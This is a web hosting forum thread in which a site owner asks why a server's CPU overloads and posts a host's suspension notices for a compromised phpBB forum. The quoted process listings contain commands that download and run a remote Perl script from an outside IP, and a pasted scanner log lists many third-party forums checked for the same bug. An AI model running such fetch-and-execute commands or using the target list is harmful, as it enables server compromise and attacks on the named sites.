what makes CPU overload ?

[zumaidi]

What can cause cpu of web server to be overloaded or reach 90% level ?
Is it because of virus/trojan ? Poorly desgined cgi/per/php script ? or what ?

[lcf]

I think... DDoS, hacker attempts, and bad written scripts.

[michaelfoo]

Not to forget the processes ran by your server. Installing too many backend scripts tend to increase server load. That's why many hosting companies opted to go for hardware firewall instead of software firewall.

Another obvious thing is the backup process ran by your server. Try not to perform backup during daytime as it does increase the load a lot. Do it during non-peak hours and that will do fine

Good luck.

[zumaidi]

thanks.

I know one case where the webhosting company refused to accept one site bec accroding to them the site consumed 90% of CPU load. The site only has MDPro ( which also include forum etc ) and download section.

It is difficult to say that DDoS, hacker attempts, and bad written scripts caused the CPU to overload since the provider must have taken care of that.

I am not sure about the backend process. Can you explain more ?

Another thanks.

[michaelfoo]

Hi zumaidi,
Backend processes are Apache (httpd), mysql, tomcat... etc that are needed to support the webserver's supported scripts. A good system administrator will optimise these processes to make sure it does not take up too much of server load.

Regarding to your case, it is possible if the site has many visitors. Apache that fails to handle the processes will bring up the server load and screw things up. This is a sign for getting a dedicated server/virtual private server for the site.

If that site does not have many active visitors, most probably it is being attacked.

Thanks.

[Filuren]

i think ddos attack would just bring the whole box down rather than seeing cpu overload. upgrading ram could solve your problem due to many process are running.

possibly too many mysql connection - create a cron to kill mysql at 1 interval
or httpd connection - if you how mp3 / video / large files for massive downloads. you can also set a cron to kill it
other possibilities are perl which uses a lot of server resources.

[michaelfoo]

Quote:

Originally Posted by Filuren

i think ddos attack would just bring the whole box down rather than seeing cpu overload. upgrading ram could solve your problem due to many process are running.

Hi Albert,
Just showing this evidence to support LiewCF's statement that his view on DoS is correct while yours is misleading:

Quote:

"A DDoS attack on root DNS Internet servers has become the most famous (a domain name is first purchased through a domain register, at the time you sign up for the domain, you're asked to submit your personal information, and information on 2 or more Name Servers; this information is stored on a 'root DNS server'; when someone searches for your domain on the web or using any other service that needs to get hold of details on your domain, these root servers are queried - CCRC) in November 2002," Alexander Gostev, an analyst for Kaspersky Antivirus Labs, recalls. "Then load on servers increased in dozens of times and processing of usual requests was extremely slowed or even stopped."

Thanks and no offence.

[zumaidi]

Thanks for the info.

Below is one message that I got from my previous web hosting provider:

Code:

Your domains, okidonline.com, has been suspended due to an insecure
script on the account allowing the download and execution of software
from /tmp. This sort of disregard for security will not be tolerated.

okid2 17231 0.0 0.0 13652 4 ? S 05:02 0:00 /usr/bin/php viewtopic.php
okid2 17234 0.0 0.0 0 0 ? Z 05:02 0:00 [sh ]
okid2 17238 0.2 2.1 53144 22452 ? S 05:02 0:50 perl asw.txt
www.aureus-rector.net/forum/
okid2 8038 0.0 0.1 13652 1980 ? S 07:49 0:00 /usr/bin/php viewtopic.php
okid2 8059 0.0 0.2 13652 2192 ? S 07:49 0:00 /usr/bin/php viewtopic.php
okid2 28540 0.0 0.0 2108 4 ? S 08:33 0:00 sh -c cd /tmp; wget
168.226.150.100//asw.txt; perl asw.txt 168.226.15
okid2 28541 0.0 0.0 3488 248 ? S 08:33 0:00 wget 168.226.150.100//asw.txt
okid2 28542 0.0 0.0 2112 4 ? S 08:33 0:00 sh -c wget
168.226.150.100//asw.txt; perl asw.txt www.okidonline.com/
okid2 28543 0.0 0.0 3488 244 ? S 08:33 0:00 wget 168.226.150.100//asw.txt
okid2 30525 0.0 0.0 2104 4 ? S 08:39 0:00 sh -c cd /tmp; wget
168.226.150.100//asw.txt; perl asw.txt 168.226.15
okid2 30526 0.0 0.0 3484 244 ? S 08:39 0:00 wget 168.226.150.100//asw.txt
okid2 32386 0.0 0.0 2116 4 ? S 08:44 0:00 sh -c wget
dbac.ac.th/phpBB2//asw.txt; perl asw.txt www.okidonline.co
okid2 32387 0.0 0.0 3504 264 ? S 08:44 0:00 wget dbac.ac.th/phpBB2//asw.txt

I did not know what kind of action shall I take to rectify the problem. The provider also did not bother to suggest or recommend any action. So, I have to put my site elsewhere and balance of my payment was not returned.

Maybe you all can explain to me what is the message is all about.
thanks.

[zumaidi]

Thanks for the info.

Below are two messages that I got from my previous web hosting provider:

1st.

Code:

Your domains, okidonline.com, has been suspended due to an insecure
script on the account allowing the download and execution of software
from /tmp. This sort of disregard for security will not be tolerated.

okid2 17231 0.0 0.0 13652 4 ? S 05:02 0:00 /usr/bin/php viewtopic.php
okid2 17234 0.0 0.0 0 0 ? Z 05:02 0:00 [sh ]
okid2 17238 0.2 2.1 53144 22452 ? S 05:02 0:50 perl asw.txt
www.aureus-rector.net/forum/
okid2 8038 0.0 0.1 13652 1980 ? S 07:49 0:00 /usr/bin/php viewtopic.php
okid2 8059 0.0 0.2 13652 2192 ? S 07:49 0:00 /usr/bin/php viewtopic.php
okid2 28540 0.0 0.0 2108 4 ? S 08:33 0:00 sh -c cd /tmp; wget
168.226.150.100//asw.txt; perl asw.txt 168.226.15
okid2 28541 0.0 0.0 3488 248 ? S 08:33 0:00 wget 168.226.150.100//asw.txt
okid2 28542 0.0 0.0 2112 4 ? S 08:33 0:00 sh -c wget
168.226.150.100//asw.txt; perl asw.txt www.okidonline.com/
okid2 28543 0.0 0.0 3488 244 ? S 08:33 0:00 wget 168.226.150.100//asw.txt
okid2 30525 0.0 0.0 2104 4 ? S 08:39 0:00 sh -c cd /tmp; wget
168.226.150.100//asw.txt; perl asw.txt 168.226.15
okid2 30526 0.0 0.0 3484 244 ? S 08:39 0:00 wget 168.226.150.100//asw.txt
okid2 32386 0.0 0.0 2116 4 ? S 08:44 0:00 sh -c wget
dbac.ac.th/phpBB2//asw.txt; perl asw.txt www.okidonline.co
okid2 32387 0.0 0.0 3504 264 ? S 08:44 0:00 wget dbac.ac.th/phpBB2//asw.txt

2nd.

Code:

Dear Customer,

One of your domains, okidonline.com, has been suspended permanently
for once again running an insecure PHP script that was used to
download and execute software on the local server. This will not be
tolerated any further.

okid2 24925 0.0 0.4 13640 4236 ? S 16:55 0:00 /usr/bin/php viewtopic.php
okid2 24927 0.0 0.0 0 0 ? Z 16:55 0:00 [sh ]
okid2 24933 0.0 0.3 4776 3180 ? S 16:55 0:00 /usr/sbin/httpd
okid2 24965 0.0 0.4 13668 4256 ? S 16:55 0:00 /usr/bin/php viewtopic.php
okid2 24967 0.0 0.0 0 0 ? Z 16:55 0:00 [sh ]
okid2 24972 98.8 0.2 4340 2356 ? R 16:55 25:16 /usr/sbin/httpd

root@cpanel28 [/tmp]# ls -la
total 324
drwxrwxrwt 18 root root 176128 Feb 13 17:21 ./
drwxr-xr-x 21 root root 4096 Feb 6 04:37 ../
-rw-r--r-- 1 okid2 okid2 0 Feb 13 16:55 .lab
-rw-r--r-- 1 okid2 okid2 18680 Feb 11 20:10 .labb
-rw-r--r-- 1 okid2 okid2 3392 Feb 11 20:11 .labs

I did not know what kind of action shall I take to rectify the problem. The provider also did not bother to suggest or recommend any action. So, I have to put my site elsewhere and balance of my payment was not returned.

Maybe you all can explain to me what is the message is all about.
thanks.

[michaelfoo]

Hi zumaidi,
I see that you're running phpBB. Also, there is an unsual activity ran by your forum. Did you modify/hack the forum?

Thanks.

[zumaidi]

hi michaelfoo,

It was a standard installation of phpBB. I did not modify/hack anything.
Is this due to the phpBB problem that people were talking about few months back ?

Anyway, if the provider had informed me that the culprit was the phpBB , then I would have taken it down.

How can a script in php can cause problem ( CPU overload ) ? Do you have sample of codes ?

thanks

[michaelfoo]

Hi zumaidi,
In that case are you running the latest phpBB version? There are a number of phpBB forums hosted under us but so far none of them are causing us problem. They do have minor hacks installed but those are the approved hacks.

I've taken a look at the report again, found that the possible reason is the server's Apache being screwed up:
okid2 24972 98.8 0.2 4340 2356 ? R 16:55 25:16 /usr/sbin/httpd

If that is the active forum that you're referring to in MYWHT, then the culprit should be the site consumes too much of server resouces via Apache requests.

Thanks.

[zumaidi]

If that is the active forum that you're referring to in MYWHT ?
MYWHT = webhostingtalk.com.my ? nope. Different one. It was not that active.

BTW, in the phpBB folder, I found a strange file name : ssh-490bK31339.

The contents are below ( only some of them ):

chk www.princess.com.tw/phpBB/viewtopic.php?p=94081 >viewtopic ok
chk www.brachman.net/phpBB2/viewtopic.php?t=654 >viewtopic ok
chk www.mom101.com/phpBB2/viewtopic.php?p=8301 >viewtopic ok
chk www.emum4nia.com/foro/viewtopic.php?p=5673 >viewtopic ok
chk http://www.online-literature.com/for...pic.php?p=5673 >viewtopic ok
chk http://www.online-literature.com/for...pic.php?p=5673 >viewtopic ok
chk 193.27.78.209/forum/viewtopic.php?TopicID=5673 >viewtopic ok
chk http://www.x2thethreat.com/x2/forum/...pic.php?t=5673 >viewtopic ok
chk www.liberaux.org/viewtopic.php?p=66113 >viewtopic ok
chk www.guitariste.com/forums/viewtopic.php?p=185780 >viewtopic ok
chk www.guitariste.com/forums/viewtopic.php?p=145336 >viewtopic ok
chk www.infobetting.com/forum/viewtopic.php?t=5673 >viewtopic ok
chk www.swedtech.se/viewtopic.php?p=6069 >viewtopic ok
chk forum.majidonline.com/viewtopic.php?t=5673 >viewtopic ok
chk www.forumet.nu/viewtopic.php?t=5673 >viewtopic ok
chk www.freestuff.gr/forums/viewtopic.php?p=5790 >viewtopic ok
chk h870500.ez-88.com/modules/newbb/viewtopic.php?topic_id=4270&forum=25 >viewtopic ok
chk http://www.kubhost.com/~kubkz/viewto...=1423&forum=10 >viewtopic ok
chk dexpot.de/forum/viewtopic.php?p=25227 >viewtopic ok
chk squares-gann.com/modules/newbb/viewtopic.php?viewmode=flat&topic_id=1502&forum=1 >viewtopic ok
chk deutschland.astronomie.info/forum/viewtopic.php?p=5673 >viewtopic ok
chk www.astronomie.ch/forum/viewtopic.php?p=5673 >viewtopic ok
chk modchips.com.br/viewtopic.php?t=5673 >viewtopic ok
chk eclipse.astronomie.info/transit/venus/forum/viewtopic.php?p=5673 >viewtopic ok
chk www.4x4brasil.com.br/forum/viewtopic.php?t=4348 >viewtopic ok
chk searchirc.com/boards/viewtopic.php?p=5673 >viewtopic ok
chk foros.datafull.com/viewtopic.php?t=5673 >viewtopic ok
chk http://www.aniworlds.com/animejanai/...ic.php?t=15462 >viewtopic ok
chk http://www.aniworlds.com/animejanai/...ic.php?t=16992 >viewtopic ok
chk www.aquariumadvice.com/viewtopic.php?t=5673 >viewtopic ok
chk www.able2know.com/forums/viewtopic.php?p=5673 >viewtopic ok
chk www.lushforums.co.uk/viewtopic.php?t=773 >viewtopic ok
chk http://www.eslcafe.com/forums/korea/...ic.php?t=14730 >viewtopic ok
chk www.gskills.com/forum/viewtopic.php?p=5673 >viewtopic ok
chk forum.tweak.pl/viewtopic.php?t=7992 >viewtopic ok
chk forum.tweak.pl/viewtopic.php?p=909598 >viewtopic ok
chk www.pc-facile.com/forum/viewtopic.php?t=7992 >viewtopic ok
chk www.easypcinfo.com/phpBB2/viewtopic.php?p=5189 >viewtopic ok
chk www.jongle.net/forum/viewtopic.php?t=7992 >viewtopic ok
chk forum.fifahungary.com/viewtopic.php?t=6 >viewtopic ok
chk macnet2.com/phpBB2/viewtopic.php?p=7992 >viewtopic ok
chk www.lemon64.com/forum/viewtopic.php?t=7992 >viewtopic ok
chk www.wetenschapsforum.nl/viewtopic.php?p=7992 >viewtopic ok
chk www.dragrace.ru/phorum/viewtopic.php?t=7992 >viewtopic ok
chk www.sciencegroups.com/viewtopic.php?t=7992 >viewtopic ok
chk www2.farbot.com:81/forum/viewtopic.php?t=368 >viewtopic ok
chk medlem.spray.se/slbphp/viewtopic.php?t=7992 >viewtopic ok
chk www.pobho.com.ua/forum/viewtopic.php?p=7992 >viewtopic ok
chk rcyanbu.com/vb/viewtopic.php?p=7992 >viewtopic ok
chk www.forumet.nu/viewtopic.php?t=7031 >viewtopic ok
chk www.forumet.nu/viewtopic.php?t=7992 >viewtopic ok
chk www.level.ro/phpBB2/viewtopic.php?t=7992 >viewtopic ok
chk www.anstoss-4.de/phpBB2/viewtopic.php?t=8299 >viewtopic ok
chk www.jay-chou.net/forums/viewtopic.php?t=7992 >viewtopic ok
chk www.broncofix.com/board/viewtopic.php?p=7992 >viewtopic ok
chk www.relaa.com/viewtopic.php?t=1133 >viewtopic ok
chk beta.debianforum.de/forum/viewtopic.php?t=7992 >viewtopic ok
chk forums.atvsource.com/viewtopic.php?p=7992 >viewtopic ok
chk filmerforum.de/Forum/viewtopic.php?p=8233 >viewtopic ok
chk filmerforum.de/Forum/viewtopic.php?p=7992 >viewtopic ok
chk www.5stone.net/phpBB2/viewtopic.php?t=7992 >viewtopic ok
chk www.5stone.net/phpBB2/viewtopic.php?t=7992 >viewtopic ok
chk wrestler.ebid.co.uk/community/viewtopic.php?t=7992 >viewtopic ok
chk workshop.headoff.com/forums/viewtopic.php?t=7992 >viewtopic ok
chk http://www.macplus.fr/plusonest/foru...pic.php?t=7992 >viewtopic ok
chk www.tutorgig.com/forum/viewtopic.php?t=126439 >viewtopic ok
chk www.homepage-forum.de/viewtopic.php?t=7992 >viewtopic ok
chk webworkshop.net/seoforum/viewtopic.php?p=7992 >viewtopic ok
chk www.certforums.com/forum/viewtopic.php?p=7992 >viewtopic ok
chk cc-team.org/forum/viewtopic.php?p=7992 >viewtopic ok
chk forum.x86-secret.com/viewtopic.php?t=946 >viewtopic ok
chk www.aliceonline.nl/forum/viewtopic.php?p=7992 >viewtopic ok
chk www.happyforen.de/forum/viewtopic.php?t=1704 >viewtopic ok
chk http://www.military-quotes.com/forum...pic.php?p=7992 >viewtopic ok
chk www.pc-tests.com/Forum/viewtopic.php?p=7992 >viewtopic ok
chk http://www.cookienest.com/newsgroups...ic.php?t=27232 >viewtopic ok
chk www.thebongstore.com/phpBB2/viewtopic.php?t=7992 >viewtopic ok
chk http://www.pocketpc.ch/viewtopic.php...topic=1&t=4271 >viewtopic ok
chk http://www.expert.ru/forums/viewtopi...=1543&start=45 >viewtopic ok
chk http://www.seibertron.com/energonpub...pic.php?t=4271 >viewtopic ok
chk forum.poetryconnection.net/viewtopic.php?t=4271 >viewtopic ok
chk http://www.fantasybaseballcafe.com/f...pic.php?t=4271 >viewtopic ok
chk www.chs.chalmers.se/punbb/viewtopic.php?id=4271 >viewtopic ok
chk www.drunkduck.com/forum/viewtopic.php?t=4271 >viewtopic ok
chk geckozone.org/forum/viewtopic.php?t=4271 >viewtopic ok
chk http://www.ipetitions.com/boards/vie...4271&forum=6&0 >viewtopic ok
chk www.searchguild.com/viewtopic.php?p=4271 >viewtopic ok
chk www.quellicheilpc.it/forum/viewtopic.php?t=16416 >viewtopic ok
chk http://www.quatloos.com/Tax-Forums/v....php?t=1000106 >viewtopic ok
chk http://www.bloggerforum.com/modules/...=3966&forum=16 >viewtopic ok
chk www.sportsfrog.com/swamp/viewtopic.php?t=4123 >viewtopic ok
chk www.photozo.com/forum/viewtopic.php?p=90629 >viewtopic ok
chk www.photozo.com/forum/viewtopic.php?p=90657 >viewtopic ok
chk www.lushforums.co.uk/viewtopic.php?t=4271 >viewtopic ok
chk www.lushforums.co.uk/viewtopic.php?p=269395 >viewtopic ok
chk http://www.portalparts.com/forum/vie...showtopic=4271 >viewtopic ok
chk mods.db9.dk/viewtopic.php?t=4271 >viewtopic ok
chk www.proxyblind.org/phpBB2/viewtopic.php?t=22568 >viewtopic ok
chk http://www.xavierforum.com/viewtopic...&t=1365&p=4271 >viewtopic ok
chk http://www.totalfrance.com/france/fo...pic.php?t=4271 >viewtopic ok
chk http://www.eslcafe.com/forums/korea/...ic.php?t=32521 >viewtopic ok
chk www.techsupportdude.com/viewtopic.php?p=4271 >bug viewtopic found >done
chk www.littleblackdog.com/viewtopic.php?t=30946 >viewtopic ok
chk sillydog.org/forum/viewtopic.php?t=4271 >viewtopic ok
chk http://www.phy.ntnu.edu.tw/demolab/p...4271&forum=2&2 >viewtopic ok
chk www.mainfo.ru/Forum/viewtopic.php?p=4271 >viewtopic ok
chk www.roofvisforum.nl/forum/viewtopic.php?t=4271 >viewtopic ok
chk http://www.autosaksasta.info/keskust...pic.php?p=4271 >viewtopic ok
chk bbs.chinacissp.com/viewtopic.php?p=4271 >viewtopic ok
chk http://www.table-tennis.com.tw/modul...271&forum=15&6 >viewtopic ok
chk forum.mamboportail.net/viewtopic.php?t=4271 >viewtopic ok
chk forums.punbb.org/viewtopic.php?id=4271 >viewtopic ok
chk www.ityt.com/forums/viewtopic.php?p=4271 >viewtopic ok
chk www.roboternetz.de/phpBB2/viewtopic.php?t=4271 >viewtopic ok
chk www.fussball-forum.de/viewtopic.php?t=4271 >viewtopic ok
chk www.fussball-forum.de/viewtopic.php?t=4271 >viewtopic ok
chk www.thebabywearer.com/forum/viewtopic.php?t=4271 >viewtopic ok
chk www.kingtutone.com/board/viewtopic.php?p=4271 >viewtopic ok
chk http://www.rwr.ru/forum/viewtopic.ph...=11&topic=4271 >viewtopic ok
chk http://www.fansbola.com/forums/viewt...4271&forum=8&1 >viewtopic ok
chk http://www.wweholland.nl/modules/new...um=31&start=30 >viewtopic ok
chk http://www.wweholland.nl/modules/new...um=31&start=15 >viewtopic ok
chk www.astronomie.info/forum/viewtopic.php?p=7272 >viewtopic ok

Now, for okidonline.com, I am using latest version of phpBB. The last one was version 2.08

[Wickedboy]

all CPU usage are caused by bad scripting or heavy usage
well most of you know how websites works? A web server and a browser communication? Overload happens when there is too many command requesting files from a web server.

Example: An example im posting this reply? This reply will be submitted by my browser to Webmastermalaysia's web server with a command asking it to place this thread into the MySQL server. The webserver will then take the file and store it in the destination requested. That is already one task If there is so many user? Doing something alike that already cause a load.

Example2: Viewing this thread? Your browser once again request from the webserver, view my every thread in this section. Web server will then search for any thread that are located in Paid Hosting Discussion Forum(known as 42). It will then retrieve the data and arrange them based on the style sheet before reforwarding them to your web browser for your usage.